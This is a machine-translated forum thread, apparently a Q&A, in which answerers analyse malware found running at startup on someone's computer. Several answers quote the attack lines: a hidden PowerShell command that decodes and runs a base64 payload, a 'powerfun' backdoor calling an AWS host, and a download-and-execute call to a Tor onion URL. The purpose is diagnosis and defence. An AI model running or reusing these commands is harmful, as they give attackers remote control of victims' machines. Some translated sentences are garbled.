启动时运行奇怪的代码

#1 楼

简短版本
攻击者可以在您的计算机上运行任何PowerShell命令，可以通过获取“ ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com”的所有者来查找。
长版本
我将二进制数组转储到文件中并上传到VirusTotal。
新启动的文件对我来说似乎是一个额外的阶段，因为它很小（1.7 kb），并且仅会执行10秒钟，因为它将绑定到PowerShell（因为攻击者创建线程而不是将其作为单独的进程启动），并且在最后一条命令时终止延迟10秒钟。
更新：我很遗憾，我无法对装配进行逆向工程，但是使用文本编辑器快速浏览了该文件，发现以下字符串：但仍然可以转储至：

powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)

这是一个相当简单的PowerShell后门，它正在连接到服务器，然后允许在跟踪以在计算机上远程运行PowerShell命令。可以通过在google上搜索两秒钟来在GitHub上找到此“ powerfun”脚本，因此在这里我不会链接该脚本以扩展反垃圾邮件限制。但是，通过将其与原始脚本进行比较，您会很快注意到攻击者将远程服务器地址更改为“ ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com”和端口到9999，因此如果需要，可以轻松地跟踪攻击者。
最后：服务器仍在侦听该端口，因此攻击者可以控制您的计算机！

#2 楼

简短版本
您的计算机已受到攻击，攻击者仍然控制着您的计算机。
长期版本
通过解码base64编码的表达式（在-Enc参数中传递的字符串），您可以获得由PowerShell执行：

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")

该代码基本上从Tor隐藏服务中下载一些PowerShell代码（通过onion.to网关，该网关允许从未连接到Tor的计算机上访问Tor隐藏服务。 ）并执行它。
这是下载并执行的代码（再次，内联执行base64编码的PowerShell脚本）：

powershell -Enc [long base64 encoded string]

据我了解，此代码导入系统DLL，然后执行一些本机代码（第8行上的长字节数组）。字节数组并将其提交给VirusTotal，以尝试确定它是恶意软件还是可怕的恶意软件ctly在沙箱中运行PowerShell脚本以动态分析其行为。

#3 楼

它正在运行带有Base64编码的Powershell代码的Powershell脚本。

这是正在运行的已解码Powershell代码：脚本正在从https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq下载和调用内容

我警告您导航到一个潜在的恶意链接，我将让您进一步挖掘。尤其是因为它来自* .onion.to，是TOR地址。